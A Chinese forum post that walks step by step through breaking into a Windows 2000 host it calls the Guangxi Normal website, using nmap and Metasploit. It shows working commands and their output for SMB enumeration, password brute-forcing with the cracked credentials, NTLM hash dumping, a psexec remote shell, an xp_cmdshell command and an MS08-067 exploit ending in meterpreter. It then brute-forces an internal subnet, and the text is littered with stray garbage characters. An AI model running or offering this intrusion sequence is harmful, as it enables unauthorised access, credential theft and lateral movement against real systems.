广西师范网站http://202.103.242.241/. C6 h/ w" u5 K% O/ R* q
" x1 a5 ^1 i5 o4 kroot@bt:~# nmap -sS -sV 202.103.242.241
9 \: W, E; S; w7 ]+ d6 t
$ K9 v8 G+ G8 f/ `( ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST5 S% S2 f, m w& u
D* g" Y* A/ s! i
Nmap scan report for bogon (202.103.242.241); ]# w: C3 D$ E1 Z6 L' J
, Z' t2 }: V7 M4 g' H# z" nHost is up (0.00048s latency).
& H4 m2 W: x9 U |4 y& }7 J5 U3 R, Y0 o: f R
Not shown: 993 closed ports
/ [* [7 S3 W" `, Q. n
' w/ `8 u8 E0 w7 d7 {3 f( v/ gPORT STATE SERVICE VERSION7 L- B7 |3 z0 B+ A6 S
( B2 K7 @ A6 r4 {( M135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. `; C- r& l+ ]; x0 Z: m7 e2 x6 S, r: t3 p$ D: m9 C
139/tcp open netbios-ssn
- R5 n8 x' \9 ]
6 \ p) w+ t% F445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds% H" n( Q3 ?: h7 z! z
9 S5 j; L: U% Y( Q
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 z$ h/ t1 U% z# a' S0 e5 i% P( U4 n8 E5 S% ~) C* |; S/ T, g O( I! H5 C
1026/tcp open msrpc Microsoft Windows RPC
5 l0 `" B, R2 Q: f% f
) p7 p2 Y1 @ C& V0 I0 _% @3372/tcp open msdtc?( S% W/ Y+ m& v7 V" I
% s' W5 O$ O* a \3389/tcp open ms-term-serv?
% q& E9 c* G% j- [) U% _5 {% g1 V- c! S; I
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :8 G1 w+ j1 ?6 N* _8 m
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
2 f% r9 _$ q- U9 h# A
: _" O8 Z& b. z: u2 h8 }; }SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions- z! T0 u* e, q9 R
) V0 H8 q6 F) M7 T
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)% {# B' x1 {: |1 `" ~
$ x0 a0 i' Z- [SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO1 Z$ q) ]- s4 o9 p7 D) D; ?8 R
/ O0 ^% n2 E& Y P5 Y$ d& T+ u
SF:ptions,6,”hO\n\x000Z”);
. O* r7 Z8 o& x, ]" r6 `; l% N. u: o6 c4 ^3 f( w9 R
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" D( I. @, ] G4 g0 Z
* c# j: W- b1 @Service Info: OS: Windows
7 L, A/ E' G. }0 H: w& X; ]" K! t6 v1 n1 S2 A
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .$ ]! g+ A1 L8 r4 N7 v/ w
L2 N, `) j& V4 _7 O
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
" t. z% v3 o( {2 o, Q* `3 q- Z% C; Y
. [! [* t( R8 W- P1 P2 |root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
& _4 J4 @! r8 [9 S. }; Z0 V6 Z3 |
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
' l2 d9 p: O, Y4 w; o, Y1 o, e4 P6 l7 Y6 }% v
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse# U5 C' n0 ~% B6 T: p5 n
6 v& A$ x# p4 u4 T& [-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
; e, Y+ Y1 A2 O2 B4 {6 e* [
" O; J; E% Z# f( N5 W! \2 u, y" P$ X-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
' ], ^( T8 c4 j' ?8 [( r; |: |5 B9 ]& c4 U
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse# v; `* ~2 A$ a/ [, L
`# n, E- o. j4 C9 J4 \. @
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
9 B& d! ]1 O( E, ^
! A/ T% l5 T9 h0 n. q. ?-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse) u3 O9 [8 t; W0 M0 C
: b. M, R% u- r7 Q! A
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse0 G2 s$ G" M" q
, }& F2 I! f0 U- @% c$ T0 I-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
# ?2 ^2 H# V7 e8 t$ B- n% ?' W% u. W
& X5 L: \. U3 f. {" x$ M-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
3 o; y' E, @9 P E( n/ ^' n0 A; S0 v7 \1 E: s5 J3 j4 @
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse# E; P: Q$ }/ a1 j
% F% J z) }- h1 s3 }
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" u# l! [! }9 @8 h* f# `; k, x7 H( S1 d
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, w T# P( I e& `. F& k3 l0 ]% g& e; U, F% B
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse: `& I6 U3 |& k( M
/ I8 P: E/ o2 J. {3 \
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
' O! r8 Y1 p* T- U* M+ w" A$ O8 g/ B/ i8 x* c5 P4 _; b$ C- m( `
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
- P1 e; b( E& b7 ]. P2 G) x
3 N. Q1 E& o7 j0 I//此乃使用脚本扫描远程机器所存在的账户名
J1 ~. l E: @; d$ S5 l) Z! C, j$ D: C6 y* x
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST' v, N0 h5 a; K# y( R2 @0 r K
8 {) T j- l# M4 o& c% tNmap scan report for bogon (202.103.242.241)9 S* v e) d% S, D: a: {
' a2 Y) l6 Z0 G$ ]Host is up (0.00038s latency).
" ?% R: ^" N! }: f1 Q7 J
% M. q6 b2 a v4 D6 q8 kNot shown: 993 closed ports. Z$ c, z7 {9 N4 _: h8 F* ], a
6 P. [ I% X. m k6 _, ^+ ^' dPORT STATE SERVICE: ~! v, q- i8 W+ _( ]7 g
@, m: H% H5 @2 O- {3 p5 i
135/tcp open msrpc
1 n. d c4 J" e5 c; \& u6 V
8 A* W2 q4 \' S% i# p- f) X139/tcp open netbios-ssn
2 D2 O8 w* N) M" \4 p, k5 H# S: C- S9 W- F
445/tcp open microsoft-ds
# f' D" S L' S2 \* T ]- F/ s; D
1 |9 E% K( e- r: L1025/tcp open NFS-or-IIS
1 ]" s4 { }' ]* @' v0 A2 W% d+ f
1026/tcp open LSA-or-nterm
: h& \# d4 i9 D" S( @8 q
* H( M2 n- J1 K5 ~- P/ c. a8 c0 F3372/tcp open msdtc
. S2 k' k- r5 O. I9 @5 L9 H' U0 N
3389/tcp open ms-term-serv
1 s- ?' l/ D ~ M. {
i" E T6 d4 g& d& d6 X' SMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 m7 M) o1 o& \" D% j* d
& D* u! F/ p# t! k
Host script results:
: V# l" O; q2 V% v% W: v' V, ?1 X, P& x' X/ f, m) _4 M* C
| smb-enum-users:7 T1 V6 ^, t. p$ T/ W
+ y; A) _8 D3 G' q! Q
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果( k1 h- N3 t, K
3 R9 B# |2 C+ aNmap done: 1 IP address (1 host up) scanned in 1.09 seconds( E3 L/ N$ Q- d, \1 x+ v2 v# M
& f N7 D8 N5 T3 M# V" G9 N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 + t' n/ r( E/ U+ ?/ ~
' G5 i0 H' M9 f; m: j" j. R: H7 z//查看共享
6 n2 t1 O6 r# y$ C) N
& d& H: E6 o4 K) w( mStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST0 f# b& u) Y$ Z! b9 v! F
' H4 p: f+ m$ P. d7 L. q4 ^2 jNmap scan report for bogon (202.103.242.241)
, H1 J! [! }& Y* U7 X5 V, |8 b7 A2 y+ ~
Host is up (0.00035s latency).7 [5 _- l& Q" [: P) R/ ]
( _3 G2 {8 y/ }! A: [, [
Not shown: 993 closed ports
" ?7 H& R- l5 V- G! D% t- a( I" a7 F
PORT STATE SERVICE
9 U1 i4 c# v0 T% V5 \4 k
% v* g6 }5 S" }135/tcp open msrpc
* n" o3 {+ t& g0 a6 J7 s/ T& o+ C/ G
139/tcp open netbios-ssn1 W, i( U" g0 S# o' t) u
5 x1 W2 P, R- }( V J5 L
445/tcp open microsoft-ds
( q- t' j, L9 u0 y6 j; ]6 c& n9 s8 h7 C& d1 y& p
1025/tcp open NFS-or-IIS5 {) N3 n) H1 }' t% M, G
4 l( P( _; Y/ a5 c) t8 t1026/tcp open LSA-or-nterm
6 Z' q' D4 v0 Y( I
! W) j) A& D( p# Z& ~( F3372/tcp open msdtc
% F- Y( j/ _8 K o& S5 a' m* Z" T7 D1 K
3389/tcp open ms-term-serv# ^, ~" Y" [' ?) F$ k; e) _
, {6 S6 E5 W* [; f( M0 y) U/ L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 \7 T) K6 q1 o+ c# k3 C
# R. g# D7 O* O3 U. c+ @+ Y" w" `
Host script results:
: @$ @# m( [) W% j9 d& H
6 L% g9 L- q; L; V1 p, c' B9 P) F| smb-enum-shares:7 v# p3 c6 v+ Z' Z' U3 q$ _
, A$ m7 H8 r% k; ~5 p| ADMIN$
; f( O9 G; v4 T& z1 ?( x$ S) I7 c1 }2 O- Y+ u2 R
| Anonymous access: <none>* z. I: o" W2 T( N# i
/ T4 {% s4 S- J/ V! H. C8 x% B
| C$' Z; Q8 p* [9 ]
8 W1 n5 b3 _" F) ~* [| Anonymous access: <none>
w) S) A' O7 N& w" @7 n
4 O" d2 {. U$ \+ j8 f+ ]| IPC$; @& @) K# e3 W5 P! l7 t4 c
% `( r) d" Q2 a4 u3 N# Q2 e|_ Anonymous access: READ
9 f) o1 k6 }4 E1 u/ m* c) _* O# O0 ^* h e) g9 D9 ?
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
; X* m8 ]. o/ ]+ y0 F: C8 Y) w! C% N* a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 3 X J! I: T4 T7 b
8 g0 r6 o. Q2 w# t# j- }/ {2 J/ V//获取用户密码 D8 A1 S# ]: c& Q9 k
! c1 q! b' s4 J! V0 Y+ t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST0 d! s0 M9 H3 C; X3 [! m- ?+ H
$ H- q7 C! B& Z/ E4 V
Nmap scan report for bogon (202.103.242.2418) f. m" a/ k1 C& m
! c( E/ }" K$ n: @+ |Host is up (0.00041s latency).' d' _# t( D, F% [
# }9 R8 N+ m# O& ANot shown: 993 closed ports' T2 ]! k# T1 F% J! M, Y1 l
6 k( H0 _! i7 @: P" P* R
PORT STATE SERVICE: K+ Q. A1 E' w# W$ B" ~
# v; M6 N( ~) |1 Q. A4 K( K) p
135/tcp open msrpc0 y* J6 |; |7 v/ q' w {
, t/ m$ W- a& V( J# F9 v+ _* h139/tcp open netbios-ssn! U3 n3 _& \- q" ^2 `( t
& O* y1 s. K# s2 i
445/tcp open microsoft-ds
4 B+ E4 E! o E/ k/ B. l2 B
( R. I) u4 K, \0 n, U0 W5 {* [1025/tcp open NFS-or-IIS
4 N( H; H8 p/ l2 J3 L
' F d9 C& a& P! S4 B4 H0 m6 S1026/tcp open LSA-or-nterm
" g' G3 Q* z7 \* w% c% X6 [5 }) B% q) y" f$ I; d4 f+ Z
3372/tcp open msdtc& W+ G- X5 ~9 P! S' L
) ?0 H% M0 {" t7 v$ c3389/tcp open ms-term-serv
1 v0 V8 D9 X: n+ c# y9 v1 i% ^5 C0 m/ @& O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), q$ q0 l7 a. s. c Y# B$ o" p
) g' T. e& S% G8 S1 O3 E
Host script results:
' i. ^+ W+ z( t8 g; X$ y# Y( n5 B6 S9 z w9 O8 o* }; T
| smb-brute:4 W3 N* I7 V5 D& g4 T9 ]+ ?% U
2 P7 t8 k2 i* X! H M7 k" A9 G
administrator:<blank> => Login was successful% P% |$ C# j$ s% T$ q# B9 J
; u* F' \3 v- b# B% [ b
|_ test:123456 => Login was successful
' m: o9 N" m: O5 [
% y) s/ }2 a0 d J/ ]) K" KNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
+ U6 t4 v( i& Z1 ?5 E9 d3 i3 O" k0 Z2 U
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash1 B# u1 Q/ q3 Q
5 U( H, M/ `4 N" L
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data; o2 b- p1 U8 h/ K! T4 H" ?# {
% }6 L2 y, O8 [8 F, G6 g7 iroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
& A, H6 c. \ I/ N7 p8 \
& s$ {( ~. @$ mroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139, J2 ]7 w1 C4 M% d; W
0 [7 s2 l. r4 b# j/ _
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, V' A, O" A% N6 ^) @" S* T4 q
) H% K% s- P% B3 |( rNmap scan report for bogon (202.103.242.241)
- a& ^6 `8 A' [- g6 d; B6 i
8 M7 C, g/ W& _" K1 |Host is up (0.0012s latency).& x0 C- m, J/ r1 X, f
* N. h, D# Y |' x3 N% ^
PORT STATE SERVICE! v$ L4 ^+ B2 g5 t$ X @4 k( i0 k
- l2 S4 W! Q, i5 P1 k3 M; @6 b
135/tcp open msrpc
- b, u9 m' `9 d" v* l$ D7 E/ s7 ^: p/ w! E
139/tcp open netbios-ssn
9 i, a6 J& a; Z9 ~2 R% }; t3 @" m. g( e4 v, p7 f
445/tcp open microsoft-ds; W7 ^3 d. N. t' @8 y
+ i+ B# P# g: J) B' CMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ s# y- k4 R$ o6 B6 e: _5 C7 _
" Z' p% ~" P* xHost script results:
4 @" W7 R. C. Y- `& k7 v0 f9 I
- t h( ~, Y2 U7 u6 h% K7 e| smb-pwdump:
* d. `0 ]. h$ b/ V) e- M r
7 N. |* c7 g- j+ W2 ^| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************" b% a9 Q y3 [) S
" o, p# V7 E! K! g( H4 K| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************; y' j" s" w5 m9 x4 n
9 N" G, Q9 P u1 ~
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
4 Z) h* ?% M, r
+ |+ u3 w, r7 V/ }1 b; Q' S|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2$ t) W$ |6 Y$ ]# y v
3 y- q' Z& r$ l
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds% {: N* v; ~2 @8 y
( L: C0 q5 j* N& yC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
8 z, @0 P( q% n, `3 g3 a/ v3 J- X! l0 ~) c5 W
-p 123456 -e cmd.exe
2 k* p4 X( Q9 k, B+ B+ V. k8 C7 N, j" P0 e- ?9 d& c
PsExec v1.55 – Execute processes remotely
; l" |( M! c: j" W) M1 _& S: n3 g, e- p) o3 u* ~) j& j5 w
Copyright (C) 2001-2004 Mark Russinovich/ X: s3 S; W8 _5 g1 K
; T" j, X* @5 V5 ?) GSysinternals – www.sysinternals.com
4 F- i$ V3 W/ c3 R% I
" |: y' ?& q# ^" M: N7 jMicrosoft Windows 2000 [Version 5.00.2195]
+ G* C3 m% o" G, k
3 Z# O) `) B' U& ?4 ~& G$ }(C) 版权所有 1985-2000 Microsoft Corp.6 c/ ?2 M2 H9 w' I' [8 Y% A
! i& i7 Z8 G7 {3 n2 B5 W2 ?
C:\WINNT\system32>ipconfig
3 F8 B! f6 A, }
' q8 w! y/ d6 ^5 yWindows 2000 IP Configuration
* u9 Y, K) \( Q4 E3 K% H* H1 S3 `
9 b/ a5 N- v0 m6 k0 _6 L2 H2 GEthernet adapter 本地连接:
" M% {' T" \* D) J" c9 X: b: O1 P. {- M1 `2 d8 U
Connection-specific DNS Suffix . :
4 z! k! Q3 D. [7 ^, @ o- Z, F6 S/ Q% O& Q- M/ X/ z
IP Address. . . . . . . . . . . . : 202.103.242.241
& x& q' ^. y: P) g# R4 i/ @ s' i0 v7 ~' v
Subnet Mask . . . . . . . . . . . : 255.255.255.0
$ R2 Z. l5 O2 C; c4 `& E$ A& I
6 }! w: Z7 E, _/ x7 a# B WDefault Gateway . . . . . . . . . : 202.103.1.1
& j! p5 e* l/ Z Q7 v: r0 f6 i% o2 @" W' ]8 ^$ ]$ v1 ~! k
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
9 _6 W2 J: s, }4 ^) u7 p. q) P- g$ ?6 d$ X
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
. x# `( m( S+ c
& D$ ?. ]4 J" l# ^2 lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
7 Y9 v% H4 v$ z8 v% w- @
2 k+ w* o& _$ y4 E7 }% ENmap scan report for bogon (202.103.242.241)
% T* q0 h" s2 {6 Y/ E/ X% n! E
9 K& o# ^( Y. ?4 ?' ^' M4 N8 j4 sHost is up (0.00046s latency).
6 X% ?# k) v( u2 X6 O. r. |2 J1 {8 s& j2 F' i! e; K
Not shown: 993 closed ports
8 |/ t, ~0 y4 J% y) Z' d
+ ?& @, L8 m8 P p4 sPORT STATE SERVICE
; \6 v5 s0 L& m! s6 Q: i
4 A$ _$ J6 q- _2 M135/tcp open msrpc
7 m# e3 t6 ]) V* A4 _
3 b0 J& T& I# M" r8 `/ G3 Q139/tcp open netbios-ssn
& R9 M' l" h. G1 j, j& u
6 h) a z( R I! K# N445/tcp open microsoft-ds+ G0 X* q3 e- \. l% d
2 M% d, \/ i2 W
1025/tcp open NFS-or-IIS/ E: _8 X2 {8 g8 @0 Q9 j
' \/ I/ Q3 g ?/ d& ]1 v1 u) C( t. X
1026/tcp open LSA-or-nterm
, N+ i. d* _2 Y* F& u5 n
# l* B% S* \% n; |+ m8 x3372/tcp open msdtc
% ?/ h# O: F) n8 Q! _" Z, `, ~, j9 O! L: z5 D( W
3389/tcp open ms-term-serv s! A! x i/ L
4 d% e, ^: Z* R4 T+ B, K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' X# l) W2 F& x# \/ }) l8 j& M# a$ Z/ C* x
Host script results:
, b# p$ V1 V) V$ K" w- F3 v3 N
9 H' n" q) x2 K4 @9 H% t$ A| smb-check-vulns:& @& ` \7 d! P4 W
( p$ a+ {! z. A
|_ MS08-067: VULNERABLE
- ^4 m, v3 p, p/ |. Q1 a3 ^) {: `+ W3 I
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds8 Z8 h3 _/ c' W( \, z; g2 W" P# Q
! Y+ }! J% t& S/ s( o* a7 E8 @ `
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
( }2 @/ R6 |$ i
0 J# ]! j2 A7 T1 |msf > search ms08
- {; o0 ~4 a& \+ v
6 e0 F7 W2 w) d8 j+ emsf > use exploit/windows/smb/ms08_067_netapi
1 z/ a# ^" k+ R5 p
8 S) K( r+ U$ kmsf exploit(ms08_067_netapi) > show options
- x; o7 ?8 D6 W7 V% X4 z. ]/ X3 q3 p0 q8 a, V. ]7 j
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
8 s: N" p2 b& i' E& Y* v) h |0 D" q
msf exploit(ms08_067_netapi) > show payloads5 ~1 C( `; o- W
. u0 r. J, R Q" Y/ k1 o k* i
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+ R( p0 Q2 {. c1 s5 u& S6 z9 H. Y; b# F/ ` X9 c& v9 K' b6 Y( Z
msf exploit(ms08_067_netapi) > exploit% J/ }, r8 U8 \( v$ c
* L8 P5 n! y7 Y# W8 J
meterpreter >
e4 G3 a. Q; U9 V
% f+ i6 }/ f# D( s% oBackground session 2? [y/N] (ctrl+z)
- f, o; x2 J/ S B: R1 }1 q7 ~; u8 a$ ?/ m$ C
msf exploit(ms08_067_netapi) > sessions -l
9 p4 W& i* ^- ?* p! W1 j8 y) u0 x. B. `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt, K# {( e3 K c3 ~0 C7 M/ `
$ T7 }* E# b" ^% G: b/ [
test3 U/ e4 U/ m5 L+ }) z# g: F
- B9 O- k" n+ ]6 a' e, ^1 t# l) M
administrator
4 k2 u9 F4 j0 r8 H& u. U( ^ _1 I: o7 ?4 o/ y! v5 b. V
root@bt:/usr/local/share/nmap/scripts# vim password.txt8 G9 n! l) M: Z4 M
R( z3 j7 z3 j9 a' z% I2 S
44EFCE164AB921CAAAD3B435B51404EE
2 y" L _3 M3 I d% k3 L! a* ?3 N4 f! E5 U0 F# o9 P
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
* T4 B7 x; A0 B2 g2 j
1 ?6 u. w8 Y6 M& M //利用用户名跟获取的hash尝试对整段内网进行登录) D( z- ~5 D; D% D
( K0 Y) Y- Q/ F/ lNmap scan report for 192.168.1.105: r$ {/ F# N c/ U* m
! X' u' N0 q( ]Host is up (0.00088s latency).4 P L6 B0 {5 J
0 K" F; \% g' S1 p x
Not shown: 993 closed ports
4 @+ Z, ]( L0 ?6 \) e- E1 D, N: t/ f. i8 k% ?7 k2 W
PORT STATE SERVICE' @1 D) ~9 ]! f
6 Z3 A7 y3 p1 T
135/tcp open msrpc# M! T7 m q! Z7 N
! O3 c5 |& `& H9 Z W
139/tcp open netbios-ssn/ a& y1 g' ~6 W
`6 W, |5 R1 {( k7 Q# M, r2 r# K0 P
445/tcp open microsoft-ds
1 k1 B5 F/ H& i
. I* a8 _8 }2 u9 o7 {1025/tcp open NFS-or-IIS: S- Z9 X/ Y% D: k/ _
# y4 q4 m& V! u
1026/tcp open LSA-or-nterm
+ R# R5 a. O, T3 L/ k! Y3 ?" E1 t, @4 i9 A6 v$ L
3372/tcp open msdtc
0 k {" m2 r; v- C. t9 V' D
9 K2 S5 @6 r, }* }2 n0 q3389/tcp open ms-term-serv# H0 A6 B4 i9 B* X: g
# C0 P2 G a U$ ^/ H9 ~) n2 m" k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 Y, q: r7 [; \
) ?4 T7 Y; F! t; P3 [* Y0 bHost script results:& w$ _+ L$ `# v2 _
3 v' g! v/ D9 Z# M3 X" c4 ]: b
| smb-brute:
) ]! V6 ?4 b, e+ G
! [9 g2 [' D! V f|_ administrator:<blank> => Login was successful3 `' U$ }. G: G% W" }, Y0 h; J5 w
/ L; z, v6 Z/ }) g6 X9 o
攻击成功,一个简单的msf+nmap攻击~~·: r1 T! n& Z- f. s
( m4 B+ _. G, f9 o2 Z% u
|
发表于 2012-12-4 12:46:42
收藏
支持
反对